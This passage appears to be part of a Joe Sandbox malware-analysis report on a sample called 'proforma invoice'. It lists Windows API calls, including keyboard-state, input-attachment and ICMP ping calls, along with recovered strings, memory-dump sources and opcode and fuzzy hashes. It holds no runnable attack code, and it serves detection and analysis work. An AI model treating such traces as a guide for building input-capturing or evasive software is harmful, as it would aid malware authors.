                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                  • String ID:
                  • API String ID: 2762341140-0
                  • Opcode ID: 6cf4a855a4e596a31570e167d6a96a70bcc988e94cd5d990d6c0735d8620d7db
                  • Instruction ID: d5b5dd0354e07b97d52a469ad5ee55c577082fadf399434b1f8e24749558dc1d
                  • Opcode Fuzzy Hash: 6cf4a855a4e596a31570e167d6a96a70bcc988e94cd5d990d6c0735d8620d7db
                  • Instruction Fuzzy Hash: 04C11C75A04109AFCB14DFA4D894DAEBBF9FF48314B1484A9E416DB361DB30EE81CB90
                  APIs
                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B35504
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B35515
                  • CharNextW.USER32(00000158), ref: 00B35544
                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B35585
                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B3559B
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B355AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$CharNext
                  • String ID:
                  • API String ID: 1350042424-0
                  • Opcode ID: c0552a893833cae39d0648b51b11b82e01beb745cdc21e4a3a531e98fbaf2923
                  • Instruction ID: c008b608e4153cbca7ccbb1d10288c2943ed8478218f9de43650e3649e45b911
                  • Opcode Fuzzy Hash: c0552a893833cae39d0648b51b11b82e01beb745cdc21e4a3a531e98fbaf2923
                  • Instruction Fuzzy Hash: 33617D71904608EFDF20DF94CC85AFE7BF9EB09721F204185F925AB291DB749A81DB60
                  APIs
                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AFFAAF
                  • SafeArrayAllocData.OLEAUT32(?), ref: 00AFFB08
                  • VariantInit.OLEAUT32(?), ref: 00AFFB1A
                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AFFB3A
                  • VariantCopy.OLEAUT32(?,?), ref: 00AFFB8D
                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AFFBA1
                  • VariantClear.OLEAUT32(?), ref: 00AFFBB6
                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00AFFBC3
                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AFFBCC
                  • VariantClear.OLEAUT32(?), ref: 00AFFBDE
                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AFFBE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                  • String ID:
                  • API String ID: 2706829360-0
                  • Opcode ID: 9c0d882be65180f2c622fb02c002b73cdeac9e47b3b49ea3c978792474387cd6
                  • Instruction ID: 0873df6aba09529039ea045da70713693a268488fb9f7f44e3b6363b81f4d0db
                  • Opcode Fuzzy Hash: 9c0d882be65180f2c622fb02c002b73cdeac9e47b3b49ea3c978792474387cd6
                  • Instruction Fuzzy Hash: 51412C35A00219AFDB10DFA8D8549BEBBB9FF48354F108069F956A7361DB30E945CBA0
                  APIs
                  • GetKeyboardState.USER32(?), ref: 00B09CA1
                  • GetAsyncKeyState.USER32(000000A0), ref: 00B09D22
                  • GetKeyState.USER32(000000A0), ref: 00B09D3D
                  • GetAsyncKeyState.USER32(000000A1), ref: 00B09D57
                  • GetKeyState.USER32(000000A1), ref: 00B09D6C
                  • GetAsyncKeyState.USER32(00000011), ref: 00B09D84
                  • GetKeyState.USER32(00000011), ref: 00B09D96
                  • GetAsyncKeyState.USER32(00000012), ref: 00B09DAE
                  • GetKeyState.USER32(00000012), ref: 00B09DC0
                  • GetAsyncKeyState.USER32(0000005B), ref: 00B09DD8
                  • GetKeyState.USER32(0000005B), ref: 00B09DEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: State$Async$Keyboard
                  • String ID:
                  • API String ID: 541375521-0
                  • Opcode ID: 90ebff0adedc83a53cc04a0868bfb9a75c81d2afd52b98cd30a9744e1554b292
                  • Instruction ID: 44e36c53e1c1886a29d36523499e141d7cb878cf10cd77ff116bb1aabeaeed56
                  • Opcode Fuzzy Hash: 90ebff0adedc83a53cc04a0868bfb9a75c81d2afd52b98cd30a9744e1554b292
                  • Instruction Fuzzy Hash: 0541A8349447C969FF359664C8043B5BEE0EF11344F0481EADAC6575C3DBA59DC8C792
                  APIs
                  • WSAStartup.WSOCK32(00000101,?), ref: 00B205BC
                  • inet_addr.WSOCK32(?), ref: 00B2061C
                  • gethostbyname.WSOCK32(?), ref: 00B20628
                  • IcmpCreateFile.IPHLPAPI ref: 00B20636
                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B206C6
                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B206E5
                  • IcmpCloseHandle.IPHLPAPI(?), ref: 00B207B9
                  • WSACleanup.WSOCK32 ref: 00B207BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                  • String ID: Ping
                  • API String ID: 1028309954-2246546115
                  • Opcode ID: 04894136b30ad6eb6b9fe92384f1389cdfddab266213f11261cf6dcef5cd34fe
                  • Instruction ID: 8cf38cda3ecf98b7988d841ad342430bc6d59a26b650dad342f0b9c04ff0848c
                  • Opcode Fuzzy Hash: 04894136b30ad6eb6b9fe92384f1389cdfddab266213f11261cf6dcef5cd34fe
                  • Instruction Fuzzy Hash: DE918D356182119FD320EF15D988F1ABBE0EF49318F1485A9F4699B6A3CB30ED45CF91
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharLower
                  • String ID: cdecl$none$stdcall$winapi
                  • API String ID: 707087890-567219261
                  • Opcode ID: 9bb7cb0cbfb5988f71200afe2936ae657db64eb6d3b69a110082212a405b61f0
                  • Instruction ID: 147591e9ae92f377a954fdf8f6541026d46c1be025b75ad190b51fe1e3a849d7
                  • Opcode Fuzzy Hash: 9bb7cb0cbfb5988f71200afe2936ae657db64eb6d3b69a110082212a405b61f0
                  • Instruction Fuzzy Hash: 4151C332A011269BCB14EF6CD9909BEB7E5FF65364B2142A9E42AE72C4DF34DD40C790
                  APIs
                  • CoInitialize.OLE32 ref: 00B23774
                  • CoUninitialize.OLE32 ref: 00B2377F
                  • CoCreateInstance.OLE32(?,00000000,00000017,00B3FB78,?), ref: 00B237D9
                  • IIDFromString.OLE32(?,?), ref: 00B2384C
                  • VariantInit.OLEAUT32(?), ref: 00B238E4
                  • VariantClear.OLEAUT32(?), ref: 00B23936
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                  • API String ID: 636576611-1287834457
                  • Opcode ID: c488e93c7782a56a1fa082a245d47a31231805fab6190b751a0342786ab28792
                  • Instruction ID: 7cfc4cd6bf232c993c8a79c62dffd5db934eb5fb6ebcaf3537418567bb71e3bf
                  • Opcode Fuzzy Hash: c488e93c7782a56a1fa082a245d47a31231805fab6190b751a0342786ab28792
                  • Instruction Fuzzy Hash: EA61C370608311AFD710DF54D888F6EBBE8EF49B14F104889F5899B2A1D774EE48CB92
                  APIs
                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B133CF
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B133F0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LoadString$_wcslen
                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                  • API String ID: 4099089115-3080491070
                  • Opcode ID: b20cec66bfd29f7dbfb12de82d0f046135524d7acd8cc47e8879762852661267
                  • Instruction ID: 05253d418f275b21e94f836b8d27065ee057647b405310bc680147d48da5728e
                  • Opcode Fuzzy Hash: b20cec66bfd29f7dbfb12de82d0f046135524d7acd8cc47e8879762852661267
                  • Instruction Fuzzy Hash: E6517D32900209AADF15EBA0CE42EEEB7B9EF15740F1440A5F405731A2EF252F98DB61
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                  • API String ID: 1256254125-769500911
                  • Opcode ID: 848cf60a9244d687d6ac55120a113323ec4dd3578331237e67791018393c51ef
                  • Instruction ID: 7808186bf861b1d33259ba05e571ae80a088ffc3b4f3219d6822ebf950d668c3
                  • Opcode Fuzzy Hash: 848cf60a9244d687d6ac55120a113323ec4dd3578331237e67791018393c51ef
                  • Instruction Fuzzy Hash: 0641A532A001279ACB205F7DC990DBEBFE5EB65B54B2542A9E421D72C4E736CD81C790
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00B153A0
                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B15416
                  • GetLastError.KERNEL32 ref: 00B15420
                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00B154A7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Error$Mode$DiskFreeLastSpace
                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                  • API String ID: 4194297153-14809454
                  • Opcode ID: 80cef1c4f5e22d4cc427060d6489264125ee65d56c39d30b3f114f59d07f7727
                  • Instruction ID: 6392d5eee1b15aad717b57d33fe3eb11566819b8ebe4d8af1fe80ba6656bc61c
                  • Opcode Fuzzy Hash: 80cef1c4f5e22d4cc427060d6489264125ee65d56c39d30b3f114f59d07f7727
                  • Instruction Fuzzy Hash: 74316B35A00608DFD720DF68C984AEABBF4EB89305F5480A9E4059B396DB75DDC6CB90
                  APIs
                  • CreateMenu.USER32 ref: 00B33C79
                  • SetMenu.USER32(?,00000000), ref: 00B33C88
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B33D10
                  • IsMenu.USER32(?), ref: 00B33D24
                  • CreatePopupMenu.USER32 ref: 00B33D2E
                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B33D5B
                  • DrawMenuBar.USER32 ref: 00B33D63
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                  • String ID: 0$F
                  • API String ID: 161812096-3044882817
                  • Opcode ID: b0e77bdbf1b7e7bad5afe80fb031d12a0c1b2f0570d7dc902ee8a8f10b9afbf1
                  • Instruction ID: 6fe8ad00208ae50ffb35635246b2cb8ffbd97fc364c551bdc76717f5f055fc24
                  • Opcode Fuzzy Hash: b0e77bdbf1b7e7bad5afe80fb031d12a0c1b2f0570d7dc902ee8a8f10b9afbf1
                  • Instruction Fuzzy Hash: 9B415979A01209EFDB14CFA4D884AAA7BF5FF49750F240069F956A7360DB30AA10CF94
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B01F64
                  • GetDlgCtrlID.USER32 ref: 00B01F6F
                  • GetParent.USER32 ref: 00B01F8B
                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B01F8E
                  • GetDlgCtrlID.USER32(?), ref: 00B01F97
                  • GetParent.USER32(?), ref: 00B01FAB
                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B01FAE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 711023334-1403004172
                  • Opcode ID: b8620c51adc422ec5a5df9175439b07793db05969b225e685357aa155bbacad4
                  • Instruction ID: feec0870071a3419704b28d4417ae1ec90dded2d26ed959b436b2d75d163c191
                  • Opcode Fuzzy Hash: b8620c51adc422ec5a5df9175439b07793db05969b225e685357aa155bbacad4
                  • Instruction Fuzzy Hash: A921BE70900214BBCF14AFA4CC859FEBFF8EF1A350F104595F961A72E1CB3859189B60
                  APIs
                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B33A9D
                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B33AA0
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B33AC7
                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B33AEA
                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B33B62
                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B33BAC
                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B33BC7
                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B33BE2
                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B33BF6
                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B33C13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$LongWindow
                  • String ID:
                  • API String ID: 312131281-0
                  • Opcode ID: 1655ac528b4c1f463bb8d73bc40c5c0a2560b1b4337a20d82b35d892d7d9daf7
                  • Instruction ID: 43550e28db9462a36894656565aa91c1de961f7cbab2e63db251fc4337638358
                  • Opcode Fuzzy Hash: 1655ac528b4c1f463bb8d73bc40c5c0a2560b1b4337a20d82b35d892d7d9daf7
                  • Instruction Fuzzy Hash: 9A616C75900248AFDB10DFA8CC81EEE77F8EB09700F204199FA15A72A1D774AE46DB60
                  APIs
                  • GetCurrentThreadId.KERNEL32 ref: 00B0B151
                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B165
                  • GetWindowThreadProcessId.USER32(00000000), ref: 00B0B16C
                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B17B
                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B0B18D
                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1A6
                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1B8
                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1FD
                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B212
                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B21D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                  • String ID:
                  • API String ID: 2156557900-0
                  • Opcode ID: bfd8bddcbf874af3358dc645bee2f06710f075fc4120585ad94ca8696072b662
                  • Instruction ID: f828a6efe0b6224f8d315fdc93c481f9b003578d192e98e80f5bc796a1c6e80f
                  • Opcode Fuzzy Hash: bfd8bddcbf874af3358dc645bee2f06710f075fc4120585ad94ca8696072b662
                  • Instruction Fuzzy Hash: 6331BB75500204BFDB109F64DC99F6D7FE9FB61711F204444FA09E72A0DBB49A808F60
                  APIs
                  • _free.LIBCMT ref: 00AD2C94
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00AD2CA0
                  • _free.LIBCMT ref: 00AD2CAB
                  • _free.LIBCMT ref: 00AD2CB6
                  • _free.LIBCMT ref: 00AD2CC1
                  • _free.LIBCMT ref: 00AD2CCC
                  • _free.LIBCMT ref: 00AD2CD7
                  • _free.LIBCMT ref: 00AD2CE2
                  • _free.LIBCMT ref: 00AD2CED
                  • _free.LIBCMT ref: 00AD2CFB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: fc1f23af8225f1cb4c6a8582a12060def63c37c818515792999fd4dd6b364103
                  • Instruction ID: 93f821a3d387b2fed8cd12f8de1afcb0d2c68ec430a16f332394738d3f068037
                  • Opcode Fuzzy Hash: fc1f23af8225f1cb4c6a8582a12060def63c37c818515792999fd4dd6b364103
                  • Instruction Fuzzy Hash: B311A476500108AFCB02EF54DA92EDD3BA5FF55350F4144A6FA4A9F322DA31EE50EB90
                  APIs
                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AA1459
                  • OleUninitialize.OLE32(?,00000000), ref: 00AA14F8
                  • UnregisterHotKey.USER32(?), ref: 00AA16DD
                  • DestroyWindow.USER32(?), ref: 00AE24B9
                  • FreeLibrary.KERNEL32(?), ref: 00AE251E
                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE254B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                  • String ID: close all
                  • API String ID: 469580280-3243417748
                  • Opcode ID: 0993d8c4e7cb4c1783ec6e396e3dabbd373861cf7c6b82b719a3b411f74e5250
                  • Instruction ID: 5eaeedd0336d3ca2c26e45156f75d4377fb5a087b4768604f0b43b38e8bb9ac2
                  • Opcode Fuzzy Hash: 0993d8c4e7cb4c1783ec6e396e3dabbd373861cf7c6b82b719a3b411f74e5250
                  • Instruction Fuzzy Hash: 65D1A031701212DFDB19EF55CA95B69F7A8BF06700F2542ADE44AAB292DB30ED12CF50
                  APIs
                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B17FAD
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B17FC1
                  • GetFileAttributesW.KERNEL32(?), ref: 00B17FEB
                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B18005
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18017
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18060
                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B180B0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
